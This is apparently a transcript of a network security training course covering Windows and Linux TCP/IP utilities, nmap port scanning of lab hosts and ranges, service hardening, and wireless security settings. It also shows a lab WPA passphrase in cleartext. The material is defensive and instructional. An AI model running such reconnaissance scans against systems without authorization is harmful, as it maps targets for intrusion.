learn about DNS records. For instance, if I were to type www.eastlink.ca, it would return an answer in terms of
the IP Address for that host. [He executes the following command: www.eastlink.ca. The following output is
displayed: Server: google-public-dns-a.google.com, Address: 8.8.8.8, Non-authoritative answer:, Name:
www.eastlink.ca, Address: 24.222.14.12.] Now that's being listed here as nonauthoritative because my Google
DNS server does not control the eastlink.ca DNS zone. At the same time, I could change the type of record I'm
looking at. I might type set type=mx to switch to MX record queries. And I might type whitehouse.gov. [He
executes the following command: set type=mx, whitehouse.gov.] Now this is going to show me any SMTP
mail servers that service e-mail addressed to people at whitehouse.gov. So we've got a number of very interesting
Windows utilities built into the operating system that can be used for reconnaissance, ideally for legitimate
purposes or for testing and troubleshooting of TCP/IP network issues.
After completing this video, you will be able to understand which Linux tools to use when configuring and
troubleshooting TCP/IP.
Objectives
understand which Linux tools to use when configuring and troubleshooting TCP/IP
[Topic title: Use Common Linux TCP/IP Utilities. The presenter is Dan Lachance.] In this video, we'll learn
how to use common Linux TCP/IP utilities. Much like Windows operating systems, UNIX and Linux variants
include a number of commands built into the operating system that you can use to configure TCP/IP or to
troubleshoot or check out settings related to TCP/IP. Here in Kali Linux, in the left-hand bar, I'm going to click
on the second icon to start a Terminal. [Dan opens the root@kali:~ window.] Now, here in the Terminal
where I can type commands, we're going to maximize the screen. We're going to start by typing ifconfig which
stands for interface config. Here I can see I've got two interfaces – eth0 for Ethernet 0 and my local loopback
interface. From an Ethernet 0 interface, I see things like my IPv4 and IPv6 addresses [He highlights the
following lines in the output: inet 192.168.1.151 and inet6 fe80::20c:29ff:fece:7dfd.] along with my subnet
mask. [He highlights the following line in the output: netmask 255.255.255.0.] I can also see my MAC
address, [He highlights the following line in the output: ether 00:0c:29:ce:7d:fd.] my hardware address on the
Ethernet network, and so on.
But what I'm missing here are things such as whether or not I've got a default gateway and whether or not I'm pointing to certain DNS servers for name resolution. Let's start with DNS. I'm going to type clear to clear the screen. And I'll use the cat command to display the contents of a text file under /etc called resolv.conf. [He
executes the following command: cat /etc/resolv.conf. The following output is displayed: # Generated by
NetworkManager, search silversides.local, nameserver 8.8.8.8, nameserver 192.168.1.1.] Now this file
contains information related to the DNS servers I'm pointing to. In this case, there are two, along with my DNS domain suffix, which in this example is silversides.local. Now, at the same time, if I simply type
route, I can also see here that I've got a default gateway configured on this machine. And what you're going to
notice here is that whenever you've got a route to 0.0.0.0, that is the default route. Now of course, we could test
that all this is working, for instance, by pinging something on the Internet by name.
So maybe I'll ping www.google.com. Now, unlike Windows, it's going to keep replying if that device replies to
ICMP echo requests. So, to stop the ping replies, I could press Ctrl+C. But, just like in Windows, that only
tells me if the target device is responding or not. If it's not, I don't know where the problem lies. So I can use
the traceroute command to determine that. So I'll type traceroute – R-O-U-T-E, this is all one word – Spacebar
and I can use either an IP address or a name. Here I'm going to use a name such as www.eastlink.ca. And the
first thing I notice is it's going through in step 1 or line 1, my local default gateway. Then the next thing would
be the next router on the network that gets me to the Internet and further and further through the provider
network. So each line represents a router. Now the bottom half of the screen output here isn't responding with a
name of a router or any sampling of how many milliseconds it takes to get a response from that router.
That usually means that the routers at that level are firewalled and therefore don't reply back because traceroute, like ping, also uses ICMP. Although it is a different type of transmission, it's using ICMP as its
transport mechanism. Other important commands include netstat. For example, if I type netstat -a for all and of
course I'm going to pipe that to more so it stops after the first screen full of output. [He executes the following
command: netstat -a | more.] The first thing you see at the top here are any local listening ports. [The output is
displayed in a tabular format which shows the following details of the listening ports: Proto, Recv-Q, Send-Q,
Local Address, Foreign Address, and State.] So for example, I can see that this Linux host is listening for SSH
connections. Now I could give it command-line switches to display numeric ports because we know that SSH
of course listens on TCP port 22. So I can see that that is listening. Over in the foreign address, no one is
connected because if anyone were connected to the SSH daemon, we would see their address on a higher-level
port.
So, much like in Windows, we can see which active ports we've got locally and remotely as we are connected
to other services over the network as well using the netstat command. I'm going to press Ctrl+C to cancel the
rest of that screen output. Now we can also use the arp command here in Linux [He executes the following
command: arp.] to view information about IP address to MAC address resolution. So, for example here, there
is an entry in this list in memory on this Linux host called gateway. And it doesn't give me the IP address.
Rather, it simply gives the name of the default gateway, just gateway is what it says. And then I see the
hardware address for it. So any machines I've communicated with recently on the local area network only will
show up in this ARP listing. Finally, there are ways that we can use commands in Linux whereby we can
retrieve information about DNS or to test in fact that DNS is working. One is the dig command. If I were to
type dig www.google.com, it would return information related to DNS records. So here we can see we've got
numerous A records returned with the various IP addresses that service the www.google.com web site. We also
have the nslookup command here in Linux – name server lookup – [He executes the following command:
nslookup.] much like we do in Windows where I could just type it in to enter interactive mode and then start
querying things such as www.google.com, and it returns information related to that. I would type exit to get
out of NS look-up's interactive mode. In this video, we learned how to use common Linux TCP/IP utilities.
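As a small companion sketch of my own (assuming a Linux host where /etc/resolv.conf exists in the classic format shown above), the same name server information can be pulled out programmatically:

# Sketch: read the DNS servers a Linux host points to from /etc/resolv.conf.
# Assumes the classic file format; systems using other resolver setups may
# keep this information elsewhere.
nameservers = []
with open("/etc/resolv.conf") as f:
    for line in f:
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            nameservers.append(parts[1])
print("Configured DNS servers:", nameservers)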
In this video, you will learn how to configure and scan for service ports.
Objectives
[Topic title: Configure and Scan for Open Ports. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to configure and how to scan for open ports. A port number in TCP/IP uniquely identifies a
service running on a host such as a web server listening on TCP port 80. Of course, communication back to a
client happens on a higher-level port. Some network services allow administrators to configure the listening
port. Let's take a look here in our Windows Server by going to the Start menu and searching for IIS. Then we
will start the Internet Information Services (IIS) Manager tool [Dan opens the Internet Information Services
(IIS) Manager window. Running along the top of the window, there is a menu bar with the following menus:
File, View, and Help. The window is divided into two sections. The first section is a navigation pane, which is
named Connections. It contains a Start Page expandable node, which further contains the following
expandable subnode: SRV2012-1 (FAKEDOMAIN\Administrator). The selection made in the first section
displays the information in the second section. The second section is divided into the following four
subsections: Recent connections, Connection tasks, Online resources, and IIS News.] where in the left-hand
navigator, I'll expand the name of our server, I'll expand Sites, and then I'll right-click on the Default Web
Site [Under the Sites suboption in the Connections pane, he selects the Default Web Site suboption. As a
result, its information gets displayed in the second section with the heading Default Web Site Home. On right-
clicking the Default Web Site suboption, a list of options appears. He selects the Edit Bindings option.] where
I'll choose Edit Bindings. [On clicking Edit Bindings, the Site Bindings dialog box opens which displays two
bindings. Also it contains the following buttons: Add, Edit, Remove, Browse, and Close.] Here we can see our
web server has two bindings – one for https on TCP Port 443 and another for http on TCP Port 80.
So notice here on the right, we can Add new port bindings – we can even tie them to different IP addresses if the server has multiple IPs – but we can also select an existing binding and Edit it and change things like the
Port number [He clicks the Edit button in the Site Bindings dialog box. As a result, the Edit Site Binding dialog
box opens. It contains two drop-down list boxes, namely Type and IP address; and two text fields, namely Port
and Host name.] if we really wanted to. Now you might do that for additional security so that anyone that
wants to connect to, for instance, a web site with a different port number would have to have knowledge of that
port number because it's not listening on the standard listening port. Now, at the same time, [He closes the Edit
Site Binding and Site Bindings dialog boxes.] there are plenty of tools out there both for Windows and Linux
that allow us to scan for ports. Here in Kali Linux, [The root@kali:~ window opens.] we can use the nmap
tool to scan either a network range or, in this example, a single host to see which TCP ports are open and what services this host is running.
This is part of reconnaissance, whether it's used for legitimate purposes or whether it's used for evil. So the
command here is nmap -sT for TCP and then I've given it the IP address of our Windows web server. Now
when I press Enter on that, after a moment, it will give me a listing of open TCP port numbers, one of which
certainly will include port 80 because we know that it is a web server. So we can see, we have quite a list of
open ports here including TCP port 80 HTTP. [He highlights the following line in the output: 80/tcp open
http.] We can also scan for UDP ports. I'm going to use the up arrow key to bring up a command that I've run
previously. I'm using nmap with -sU for UDP. Then I'm using -p to specify the port number I want to scan on a
host. In this case, I want to scan UDP port 53, which is the port a DNS server listens on for client queries.
So, when I press Enter in fact, [He executes the following command: nmap -sU -p 53 192.168.1.162.] I can see
that that specific port is actually open. So I know that that is a DNS server that is listening. And again, this is
all part of reconnaissance. Now we also have the option of scanning a range of machines for certain ports. For
instance, if I were to type nmap -sT for TCP and then I'll give it a range 192.168.1.100-200 and then press
Enter, it's going to scan for TCP open ports on all of those hosts. Once nmap completes the scan, down at the
bottom, I can see in this case, it's scanned 101 IP addresses, where 8 hosts are up. And, as I scroll back up
through, I can see the IP addresses and the open TCP ports on each of those IP addresses. Now sometimes, you
get fewer or more ports. It depends on what services are running on the machine and whether or not it's got a host-based firewall that limits what ports you can see.
But either way, it's pretty easy to scan for open ports to see what's running. Now, from a malicious standpoint,
the bad guys and girls will be interested in this information because if they see, for instance, that there is an
FTP or a DNS server open on a host, they can then focus on that to determine what kind of FTP or DNS server
is running and check out version information, find out what exploits are available, and then begin
compromising systems in that manner. In this video, we learned about configuring and scanning for open ports.
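If nmap isn't handy, a single TCP port can be checked with a few lines of standard-library Python. This is a rough sketch of my own (connect_ex returns 0 when the connection succeeds), and as with nmap, only scan hosts you are authorized to test; the target address simply reuses the example from this demo:

# Rough sketch: test whether one TCP port is open by attempting a connection.
# connect_ex() returns 0 on success. Only scan hosts you are authorized to
# test; the address below is just the example from this demo.
import socket
target, port = "192.168.1.162", 80
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    sock.settimeout(2)
    is_open = (sock.connect_ex((target, port)) == 0)
print(f"TCP port {port} on {target} is {'open' if is_open else 'closed or filtered'}")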
[Topic title: Network Services. The presenter is Dan Lachance.] In this video, I'll talk about network services.
Network services listen on a TCP or a UDP port number for connections. So, for example, with the client DNS
query where a client is contacting a DNS server, the source port would be a higher-level UDP port – in this
case, for example, 55298. But the destination port would be unchanging because that's the network service
listening port – in this case, UDP port 53 for a DNS server. Services will often require specific permissions on
the host operating system. Now we should try to stay away where we can from a normal user account that has
a password that never expires or no password at all. Instead, if possible, we should configure network services
to use a managed service account. Now, in the Windows environment, this is a special type of account that is
designed for use by services where it has a complex password that will change automatically on a scheduled
basis.
Here, on a Windows device, if we look at the running Services [The Services window is open. It is divided into
two sections. The first section is a pane in which Services (Local) option is selected by default. As a result, its
information is displayed in the second section. The second section contains two tabs: Extended and Standard.
The information in the second section in the Extended tabbed page displays various services such as System
Events Broker, Superfetch, and Server.] and if we were to double-click on one and open it up, [Dan double-
clicks the Server option. As a result, the Server Properties (Local Computer) dialog box opens. It contains the
following four tabs: General, Log On, Recovery, and Dependencies.] in the properties, we would see a Log On
tab where we can determine whether the service logs on with a Local System account, whether it interacts with
the desktop, or whether it's configured to use a user or a managed service account. Now one thing to watch out
for is the temptation of using an administrative type of account that has way more permissions than the service
really needs. Required services are configured in the underlying OS with permissions according to the
principle of least privilege. This means that we only assign enough permissions for the service to function
properly and no additional permissions are given. We should also configure services to control incoming
traffic sources.
So, for example, if we have a Linux host that's managed through SSH, we might require that SSH traffic
come from a known and trusted IP network range, maybe a subnet where the administrative stations exist. This
can also reduce discoverability when a malicious user is performing network scans over the network. We
should also enable encryption and authentication wherever possible. Now this can be application specific, such as
when we configure an SSL or TLS certificate, for example, for a web site, POP3 mail server, or an SMTP
server. However, we could also have encryption and authentication at a much more general level in the form of
IPsec, regardless of the higher-level protocol used.
Hardening a host means disabling unused services. At least that's one part of hardening a host. So we can
harden a host by blocking unused ports and services. And, of course, if they're disabled, then they're not
running in the first place anyway. We can also configure services in some cases to use a nonstandard port.
Now you might do this, for instance, on a web server so that when someone types in the address of the web
server in their web browser address bar, they also have to add a colon and then the port number you've
configured. Now web servers normally listen on TCP port 80 or if it's secured, port 443. But you could change
it to a nonstandard port. That also makes it more difficult for a malicious user to scan the network and map it out
based on what services they think are running because you're not using the normal service port numbers.
Another way to harden a network service is to take the log files resulting from a specific service and store them on a different host. This is important because, if the host on which a service is running is compromised, then the log files stored on it can no longer be trusted. They could be wiped, their contents could be forged, and so on. It's always
crucial that we apply the latest updates to the service and the underlying operating system hosting that service.
Some services can also be throttled. Now this might be true with some replication services that are designed
for file transfer between hosts. The great thing about this is that, if we configure throttling, it prevents
monopolization of resources like CPU utilization or network bandwidth.
Network service hardening tools include some built-in items that you'll find in some operating system
environments. So an Active Directory domain environment would use Group Policy to centrally configure
settings on devices. So we could use Group Policy to centrally disable services, potentially for thousands of computers joined to the domain. So, in this example, [The Group Policy Management window is open. The
window is divided into two sections. The first section is a navigation pane. It contains a Group Policy
Management node which further contains the Forest:fakedomain.local subnode. This subnode includes the
Domains subnode which further includes the fakedomain.local subnode. This subnode includes the Default
Domain Policy option. The second section displays content based on the selection made in the first section, in this case the information for the Default Domain Policy.] I'm in the Group Policy
Management tool for my Active Directory domain. I'm going to right-click on the Default Domain Policy GPO
on the left. And I'm going to Edit it. [He right-clicks the Default Domain Policy option. As a result, a shortcut
menu appears from which options can be selected. He selects the Edit option.] The goal here is we're going to
disable services centrally using group policy. [On selecting the Edit option, the Group Policy Management
Editor window opens. This window is divided into two sections. The first section is a navigation pane, which
contains the Default Domain Policy [SRV2012-1.FAKEDOMAIN.LOCAL] node. This node contains two
subnodes: Computer Configuration and User Configuration. The second section displays the information on
the basis of the selection made in the first section.]
Now you might say Group Policy is not a security hardening tool. Well, it can be. It depends on how you use it.
We don't want to get into the mindset of thinking only third-party tools are useful for hardening because that's
definitely not the case. So, here inside this GPO, I'm going to go on to Computer Configuration [The
Computer Configuration subnode contains two subnodes: Policies and Preferences.] on the left. I'm going to
expand Policies. I'm going to expand Windows Settings. And there are a number of things I could look at here.
For example, [The Policies subnode includes the Windows Settings subnode which further includes the
Security Settings subnode.] if I go on to Security Settings, well, naturally I have a lot of Security Settings
related to things like the File System, the Windows Firewall with Advanced Security, Public Key Policies for
PKI, and so on. But one of the things you'll see here under Security Settings on the left is System
Services. [He clicks the System Services option in the Security Settings subnode.] And, if I click that on the
right, I get an alphabetical listing of services.
So maybe what I'll do is click in that list and press R and go down to Remote Registry. Now, if I know that we
don't need the Remote Registry service running, we don't depend on it for any of our tools, then I might turn
that off to prevent remote access to the registry on a Windows host. So, if I were to double-click on it, [On
clicking the System Services option, its information gets displayed in the second section. He clicks the Remote
Registry option in the second section. As a result, the Remote Registry Properties dialog box opens.] I could
"Define this policy setting" and either set that service to Disabled or Manual. Now, once I've done this, [In the
Remote Registry Properties dialog box, he checks the following checkbox: Define this policy setting. And he
clicks the Manual radio button. Then he clicks the OK button.] Group Policy would have to refresh on
machines affected by this Group Policy object. Now that can take a couple of hours in some environments. It
really depends on your environment and how you're structured. Other ways to harden network services on a
device include using tools like Microsoft System Center Configuration Manager or SCCM. SCCM can be
used to apply security baselines to Windows and Linux device collections to make sure they align with
organizational security policy. We might also use Microsoft PowerShell Desired State Configuration or DSC
which can be used to harden both Windows and Linux hosts. Network services apply at the application layer
primarily with higher-level protocols, such as Hypertext Transfer Protocol or Secure Shell. Now, even though
these are higher-level protocols that might apply to Layer 7 of the OSI model – the application layer – that
doesn't imply that it involves user interaction. In this video, we discussed network services.
After completing this video, you will be able to explain common wired and wireless network concepts.
Objectives
[Topic title: Wired and Wireless Networks. The presenter is Dan Lachance.] In this video, I'll talk about wired
and wireless networks. Wired networks are faster than wireless networks that transmit signals through the air.
They're also considered more secure since it's harder to physically gain access to wired transmission media than
it is with signals going through the air. Now, with wired networks, wiretaps are possible; however, physical
access to the cables is required. With wireless networks, we have slower connection speeds than we do with
their counterpart – wired networks. They are considered less secure than wired and malicious users don't need
physical access to network gear in order to tap into wireless signals because they're flying through the air. As
long as they are within range and they have the right equipment, they can capture that traffic as it's being
transmitted.
Wireless networks also include cellular where the infrastructure is owned by a telecom carrier. Bluetooth
is a personal, short-range wireless technology that is used for things such as wireless
keyboards, wireless mice, media devices like Bluetooth speakers that you can hook your smartphone up to
without cables, as well as wireless headsets, and so on. The Wi-Fi standard is what most of us are using at
home in our personal networks, although you will also see it in the enterprise when secured properly. It has a
longer range than Bluetooth. Of course it's very convenient for users to connect to a Wi-Fi network. However,
the downside is it's easy for malicious users to configure a rogue hotspot. Now a rogue hotspot is what appears
to be a legitimate hotspot that users can connect to on their wireless network, but really it's been set up by a
malicious user to capture that type of connectivity information that a wireless client is transmitting.
IEEE has numerous standards including the 802.1x standard. Not to be confused with the 802.11 Wi-Fi
standard, this is different. 802.1x isn't specifically for wireless, but it can be used with wireless. But what is it?
It's a security standard. With 802.1x, we configure our network such that authentication is required prior to
being given network access. This is called network access control or NAC – N-A-C – for short. WEP stands
for Wired Equivalent Privacy. This is a wireless security standard as well. And it's an encryption standard. But
it's been deprecated for many years now because it's been proven to be easily exploited with freely available
tools in a matter of seconds. WPA stands for Wi-Fi Protected Access. This supersedes the deprecated WEP
encryption standard. It uses TKIP, which stands for Temporal Key Integrity Protocol where we have a
changing key either on a timed basis or every so many packets, for instance, every 10,000 packets to make it
harder to crack the key.
WPA, in turn, is superseded by WPA2, Wi-Fi Protected Access version 2, which enhances security by using AES or Advanced
Encryption Standard encryption. Now WPA and WPA2 can run in Enterprise mode, where a
centralized RADIUS authentication server authenticates user access to the network. So in other words, the
wireless endpoints – the wireless access points and routers – aren't doing the authentication. They're just
handing it off to the RADIUS server. That's WPA and WPA2 Enterprise. The Personal equivalents of WPA
and WPA2 simply use a preshared key that is configured on the wireless access point or router. And that same
key must be entered when a client wishes to connect to that WLAN.
Now having a centralized RADIUS authentication server is part of the overall IEEE 802.1x security standard.
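If you run your own RADIUS server, for instance FreeRADIUS on Linux, each access point is registered as a client with a shared secret. This is only a sketch under that assumption; the file path, access point address, and secret are placeholders, and nothing like this appears in the demo.

# Excerpt from /etc/freeradius/3.0/clients.conf (the path varies by distribution)
client wireless-ap-1 {
        ipaddr = 192.168.1.2
        secret = replace-with-a-long-shared-secret
}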
So how can we harden wireless networks since they are much more susceptible to attacks than their wired
counterparts? One way is to disable the SSID broadcast. The SSID is the name of the wireless network. And,
with most wireless networks, that's being transmitted for ease of connections from people that want to connect
to the network because they just scan the vicinity for wireless networks. They see the name, they click on it.
However, if we've disabled the SSID broadcast, it doesn't show up. So this means that people have to type in
the name of the wireless network, which is often case sensitive, before they can connect. Additionally, a password
is usually required as well.
We can also enable MAC address filtering on our wireless network. What this does is allow us to build a
list of either allowed or denied MAC addresses. Now a MAC address is a Layer-2 address according to the OSI
model. It's the 48-bit hexadecimal address tied to a physical network card of some kind. Normally, what's done
on a wireless network is we add a list of allowed MAC addresses. So, if your device has a wireless card with a
MAC address that matches the allowed list, you're allowed to at least attempt to connect to the wireless
network because usually there's also a passphrase or WPA2-Enterprise where there is a RADIUS server that
you also have to authenticate to.
Just bear in mind that MAC addresses are very easily spoofed with freely available tools. Another way to
harden the wireless network is, of course, to use WPA2-Enterprise so that authentication isn't done by the wireless
access point or router. Instead, it just forwards it off to a central RADIUS server. We could also consider
disabling DHCP. Because, with DHCP enabled on a wireless network, once people connect to the
network, we're giving them a valid IP configuration. Disabling it is just one more thing that could make it more
difficult for a malicious user to gain access to the network. We should also enable HTTPS administration so
that we don't have clear-text type of transmissions when admins are connecting over the network to the
wireless router or access point to administer it. So we should use HTTPS where possible.
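On consumer gear these settings live in the router's web interface, which we'll see in a moment, but if you were building a Linux-based access point with hostapd, a hypothetical configuration pulling the same hardening ideas together might look like this. The interface, SSID, file paths, and passphrase are placeholders, not values from this demo.

# Hypothetical /etc/hostapd/hostapd.conf excerpt
interface=wlan0
driver=nl80211
ssid=CorpWLAN
# Suppress the SSID broadcast so the network name must be typed in
ignore_broadcast_ssid=1
# Only MAC addresses listed in the accept file may associate (easily spoofed, but one more hurdle)
macaddr_acl=1
accept_mac_file=/etc/hostapd/hostapd.accept
# WPA2 only, Personal mode with AES-CCMP; Enterprise mode would use WPA-EAP plus a RADIUS server
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=replace-with-a-long-passphrase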
Of course, we should patch wireless router firmware. Most of us know that we should be patching software all
the time but what about firmware, especially in wireless routers? There have been numerous cases where there
have been security vulnerabilities found in router firmware for wireless networks. So be sure to always keep up
to date, maybe subscribe to vendor web sites for your wireless router equipment to make sure you know when
there is a new firmware update. Here you're looking at the configuration page in a web browser for an Asus
wireless router. [The configuration page of the ASUS Wireless Router RT-N66U tool is divided into two
sections. The first section contains two subsections: General and Advanced Settings. The General subsection
includes several options such as Network Map, Guest Network, and Traffic Manager. The Network Map
option is selected by default. The second section displays the information on the basis of the selection made in
the first section. The second section includes subsections such as Internet status, Security level, and System
Status. The System Status subsection contains three tabs: 2.4GHz, 5GHz, and Status. The 5GHz tab is selected
by default. Its content includes various fields such as Wireless name(SSID) and WPA-PSK key and drop-down
list boxes such as Authentication Method and WPA Encryption.] Now, here under the System Status section
over on the right, we can see there is a drop-down list for Authentication Method for the wireless network.
"Open System" means it's not secured at all. Here it's set to WPA2-Personal, where down below, it's using
AES encryption. And we can see there is a preshared key or a PSK that's configured here on the wireless
router. People would have to know that to make a connection from their desktops, laptops, smartphones, and so
on. But, from the Authentication Method list, I could also choose WPA2-Enterprise where I would use a
centralized authentication server – a RADIUS server – other than the authentication being done here on the
wireless router. At the same time, if I were to click on the Wireless Advanced Settings over on the left with
this particular model, now the menus will differ depending on your wireless router. [In the Advanced Settings
subsection of the first section, Dan selects the Wireless option. As a result, its information is displayed in the
second section. The second section includes several tabs such as General, WPS, and WDS. The General tab is
selected by default. It includes several fields such as Band, SSID, and Hide SSID.]
But, over on the right, I have the option to Hide SSID or not. Notice here it's set to No, which means that it is
broadcasting the SSID. Anyone within proximity – within range of my wireless network – will see the name
being broadcast. Now the name – if we go back to the Network Map section over on the left, we can see here
the name of this wireless network is linksys5GHz. So that would be seen because it's not been suppressed from
being broadcast. Now, over on the left – if I were, for example, to click on LAN...now when I do that, [In the
Advanced Settings subsection of the first section, he clicks the LAN option. As a result, its information is
displayed in the second section. The second section includes tabs such as LAN IP, DHCP Server, and Route.
The LAN IP tab is selected by default. It contains two fields: IP Address and Subnet Mask.] it opens up a new
menu system where, for instance, I could go on to the DHCP Server tab and disable DHCP. Currently it's set to
Yes. It is currently enabled. [He clicks the DHCP Server tab. As a result, its information gets displayed which
contains several sections such as Basic Config and Enable Manual Assignment. The Basic Config section
includes several fields such as Enable the DHCP Server, Lease time, and Default Gateway.] If I scroll down
and choose the Administration menu link down on the left...and remember these menu links in these interfaces
are going to change even when you apply a firmware upgrade to your current router. [In the Advanced Settings
subsection of the first section, he clicks the Administration option. As a result, its information is displayed in
the second section which includes several tabs such as Operation Mode, System, and Firmware Upgrade.] I
have the option of going to the Firmware Upgrade tab where I can see which firmware version we're currently using.
This is also where I would specify, of course, the New Firmware File that I want to apply to my wireless
router. And, on the left back onto Wireless one more time, we can see we have a Wireless MAC Filter tab [In
the Advanced Settings subsection of the first section, he clicks the Wireless option. As a result, its information
is displayed in the second section which includes several tabs such as General, WDS, and Wireless MAC
Filter. He clicks the Wireless MAC Filter tab.] where we could specify which specific MAC addresses, if I
choose Yes to turn that on, [The Wireless MAC Filter tabbed section contains two subsections: Basic Config
and MAC filter list (Max Limit: 64). The Basic Config subsection contains two drop-down list boxes: Band
and MAC Filter Mode. It also contains Enable MAC Filter field, adjacent to it are two radio buttons: Yes and
No. He selects the Yes radio button for the Enable MAC Filter field.] should be allowed to connect to this
wireless network.
[Topic title: Use Common Wireless Tools. The presenter is Dan Lachance.] In this video, I'll demonstrate how
to use common wireless tools in both the Windows and Linux operating systems. Let's start with Windows 10
where I've already started the Network and Sharing Center. [The Network and Sharing Center window is open.
In this window, there are two sections. The first section is a navigation pane which has the following options:
Control Panel Home, Change adapter settings, and Change advanced sharing settings. The second section has
the following subsection displayed: View your basic network information and set up connections. Under this
subsection, there are two subsections: View your active networks and Change your networking settings.] In
the Network and Sharing Center, we can see any active network connections that we have over here on the
right. I see that I'm connected to a network called linksys, which is the name of a wireless network. And we're
connected through our interface called Wi-Fi. So I'm going to click on Change adapter settings over on the
left [In the navigation pane, Dan clicks the Change adapter settings option. As a result, the Network
Connections window opens. It displays various network adapters such as Ethernet, Ethernet 3, and Wi-
Fi.] where I can see I've got my Wi-Fi network adapter as I've named it and it's connected to the linksys
wireless network. As with any network adapter, [He right-clicks the Wi-Fi network adapter. As a result, a
shortcut menu appears from which options can be selected.] wireless networks are really no different in the
sense that we can go into the Properties of adapters for them and we can configure things [From the list of
options, he selects the Properties option. As a result, the Wi-Fi Properties dialog box opens. It contains two
tabs: Networking and Sharing. Under the Networking tab, there are the following three sections: Connect
using, This connection uses the following items, and Description.] such as Internet Protocol Version 4
(TCP/IPv4), Internet Protocol Version 6 (TCP/IPv6), and so on. In the case of a wireless network connection,
there is also a Sharing tab that we might go into to allow other networks that we might be connected to, [He
clicks the Sharing tab in the Wi-Fi Properties window. Under this, he checks the following checkbox: Allow
other network users to connect through this computer's Internet connection.] including wired networks to
access the Internet through our wireless connection. However, I'm not going to do that, I'm going to Cancel.
Now, in the Windows environment as well, I can go down into the taskbar area and click on the arrow to get a
list of wireless networks.
Now any wireless networks that are hidden will show up as Hidden Network. And, when you click on it,
you've got to specify the name of the wireless network that you want to connect to, and it's case sensitive.
Now, beyond that, if you have to supply a passphrase or anything like that, that will also be required in
addition. But, in the Windows environment, we can also use Group Policy essentially in Active Directory to
configure wireless network settings. I've started the Group Policy Management tool where on the left, I can see
the Default Domain Policy GPO, or Group Policy Object. [The Group Policy Management window opens. In
the first section, the Default Domain Policy folder is selected by default and its content is displayed in the
second section.] I'm going to right-click on it and Edit it because I want to essentially configure Wi-Fi settings
for many clients with this central single configuration. [The Group Policy Management Editor window is
open. In the first section, under the Computer Configuration subnode, there are two subnodes: Policies and
Preferences.] So, therefore on the left, what I would have to do to make that happen is under Computer
Configuration, I would expand Policies, Windows Settings, and then Security Settings.
Now, under here, what you're going to see on the left is Wireless Network (IEEE 802.11) Policies. So I'm going
to expand that. Now there is nothing to see yet. And so, if I click on it on the right, I see that nothing has been
configured. So, to configure something on the right, I would right-click [In the navigation pane, under the
Security Settings subnode, he selects the Wireless Network (IEEE 802.11) Policies option. In the second
section, he right-clicks and a shortcut menu appears from which options can be selected.] and "Create A New
Wireless Network Policy for Windows Vista and Later Releases". [The New Wireless Network Policy
Properties window opens. It contains two tabs: General and Network Permissions. The General tab is selected
by default. It includes three fields such as Policy Name, Description, and Connect to available networks in the
order of profiles listed below. The third field contains table with no entries. There are several columns in it
such as Profile Name, SSID, and Authentication. Below this table, there are the following buttons: Add, Edit,
Remove, Import, and Export.] So essentially, what I would be doing here when I click the Add button is
adding an Infrastructure type of wireless network not an Ad Hoc [He clicks the Add button. As a result, a list
of options appears, he selects the Infrastructure option. Then the New Profile properties dialog box opens.] or
peer-to-peer network where I would specify the SSID of the network, [The New Profile properties window
contains two tabs: Connection and Security. The Connection tab is selected by default. Under this tab, there
are various fields such as Profile Name and Network Name(s) (SSID).] whether we should connect to it
automatically, and so on. Now, under Security, I can specify the type of security whether it's WPA-
Personal [Under the Security tab, there are two drop-down list boxes: Authentication and Encryption.] which
requires only a preshared key or whether it's WPA2-Enterprise which uses a centralized RADIUS
authentication server. But the one thing I can't configure here is passphrases.
So the user will still have to know that; they will be prompted for it when they connect the first time. But the nice
thing about this is when Group Policy refreshes on Windows clients, which could take a few hours in some
environments, this will automatically be configured as a wireless network setting for them. It saves us from
having to do it individually on each wireless client. Now let's flip over to the Linux side, where in various
Linux variants, yes, we can use the GUI interface to configure wireless settings. But we're going to do it at the
command-line level, which is pretty standard and generic. Here, in Kali Linux, at the terminal prompt, [The
root@kali:~ window is open.] the first thing I will do is type iw dev to show any wireless devices. [He
executes the following command: iw dev.] Here I can see I've got an interface called wlan0. So that's the one
that we're going to be working with. Now what I could do is use the command iwlist, Spacebar, the name of
my interface wlan0, Spacebar, scan. Now I'm going to pipe that to the "more" command. The pipe symbol is
the vertical bar symbol. You get that by shifting your backslash key. I'm doing this because I want it to stop
after the first screenful of information because this is going to list wireless networks that are visible to this
station.
Now, when I do that, it will list a lot more than just the wireless network names or SSIDs. It's going to list a lot
of details [He executes the following command: iwlist wlan0 scan | more.] for each wireless network that
shows up in the list. So, for instance, here I can see my first wireless network and notice that the ESSID is
actually not really visible. It looks like a bunch of x's and 00's because this is a hidden network. But I can still see
other details like the MAC address, the channel, the frequency, and whatnot. So, as I go through this
screen output, I'll see various SSIDs for different networks that were seen from this command. Now what I
could do is bring that command back up with the up arrow key. Instead of piping it to more, I'm going to pipe
it to the grep line filter where I am going to take a look for SSID in capitals. [He executes the following
command: iwlist wlan0 scan | grep SSID.] This is going to show only lines that contain the text SSID. So, if
the names of the wireless networks are all I'm looking for, then this might be the way to go when using
iwlist. So here I can see the first entry again as a hidden wireless network, then I see others like linksys,
ASUS_Guest1, and so on. So now that I've gotten this far, the next thing I want to do is configure my station to
connect to the linksys network. So I'll do that by typing iwconfig wlan0 that's my wireless interface. And I'll
tell it that the ESSID I want to connect to is called linksys. Now this will work even if it was a hidden wireless
network. [He executes the following command: iwconfig wlan0 ESSID linksys. The following output is
displayed: Error for wireless request "Set ESSID" (8B1A) :, SET failed on device wlan0 ; Operation already
in progress.] Now, if I already have a connection to that wireless network which I do, I will get a message that
states that the operation is already in progress. So this is expected in this particular case.
Now the next thing that I could do is use the wpa_passphrase tool to specify the WPA passphrase in a file that
I will feed in to my connection, to that wireless network called linksys. So I'm going to use wpa_passphrase,
then I'm going to give it the name of my wireless network linksys. And I'm going to give it the passphrase for
WPA. So I am going to put it in the proper case and then use output redirection – the greater than
symbol – to create a file here called linksys.conf. It could be called anything. Now the next
thing I want to do is just view that. I'll use the cat command [He executes the following commands:
wpa_passphrase linksys urnotFam0us > linksys.conf and cat linksys.conf.] to take a peek at what it did. And
notice that it commented out the text version of my passphrase. So now we've got our preshared key in a form
that is usable to associate with the access point. So, to make that happen, we're going to use the
wpa_supplicant command. Now this is kind of a weird Linux command in that when you use command-line
parameters like -D for the driver, the value isn't separated from the parameter by a space as is normally the
